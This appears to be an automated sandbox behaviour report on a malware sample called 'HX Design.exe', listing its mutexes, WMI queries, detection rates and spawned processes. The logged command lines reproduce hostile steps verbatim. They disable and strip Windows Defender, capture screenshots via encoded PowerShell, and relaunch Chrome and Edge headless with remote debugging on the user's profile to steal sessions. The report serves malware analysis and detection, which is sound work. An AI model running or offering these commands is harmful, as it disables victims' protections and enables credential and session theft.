Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:280:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2304:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7968:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7672:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7616:120:WilError_03
Source: C:\Users\user\Desktop\HX Design.exe	Mutant created: \Sessions\1\BaseNamedObjects\0
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6712:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8172:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:344:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6472:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4476:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7668:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7244:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7816:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7776:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8188:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3612:120:WilError_03

Source: C:\Users\user\Desktop\HX Design.exe

File created: C:\Users\user\AppData\Local\Temp\_MEI75082

Jump to behavior

Source: HX Design.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msedge.exe")
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msedge.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msedge.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msedge.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")

Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\HX Design.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: HX Design.exe, 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: HX Design.exe, HX Design.exe, 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: HX Design.exe, HX Design.exe, 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: HX Design.exe, HX Design.exe, 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: HX Design.exe, HX Design.exe, 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: HX Design.exe, HX Design.exe, 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: HX Design.exe, HX Design.exe, 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: HX Design.exe	Virustotal: Detection: 50%
Source: HX Design.exe	ReversingLabs: Detection: 39%

Source: HX Design.exe	String found in binary or memory: set-addPolicy
Source: HX Design.exe	String found in binary or memory: id-cmc-addExtensions
Source: HX Design.exe	String found in binary or memory: --help
Source: HX Design.exe	String found in binary or memory: --help
Source: HX Design.exe	String found in binary or memory: can't send non-None value to a just-started async generator
Source: HX Design.exe	String found in binary or memory: can't send non-None value to a just-started generator
Source: HX Design.exe	String found in binary or memory: fma($module, x, y, z, /) -- Fused multiply-add operation. Compute (x * y) + z with a single round.
Source: HX Design.exe	String found in binary or memory: various kinds of output. Setting it to 0 deactivates this behavior. PYTHON_HISTORY : the location of a .python_history file. These variables have equivalent command-line options (see --help for details): PYTHON_CPU_COUNT: override the retu
Source: HX Design.exe	String found in binary or memory: various kinds of output. Setting it to 0 deactivates this behavior. PYTHON_HISTORY : the location of a .python_history file. These variables have equivalent command-line options (see --help for details): PYTHON_CPU_COUNT: override the retu
Source: HX Design.exe	String found in binary or memory: can't send non-None value to a just-started coroutine

Source: C:\Users\user\Desktop\HX Design.exe

File read: C:\Users\user\Desktop\HX Design.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\HX Design.exe "C:\Users\user\Desktop\HX Design.exe"
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Users\user\Desktop\HX Design.exe "C:\Users\user\Desktop\HX Design.exe"
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HX Design.exe'"
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HX Design.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\33ajg45c\33ajg45c.cmdline"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6698.tmp" "c:\Users\user\AppData\Local\Temp\33ajg45c\CSCD665F1311EED4D7D921539AB761843.TMP"
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --restore-last-session --remote-debugging-port=1111 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local\google\chrome\User Data" --profile-directory=Default https://www.google.com
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless --restore-last-session --remote-debugging-port=2223 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local/Microsoft/Edge/User Data" https://www.google.com
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
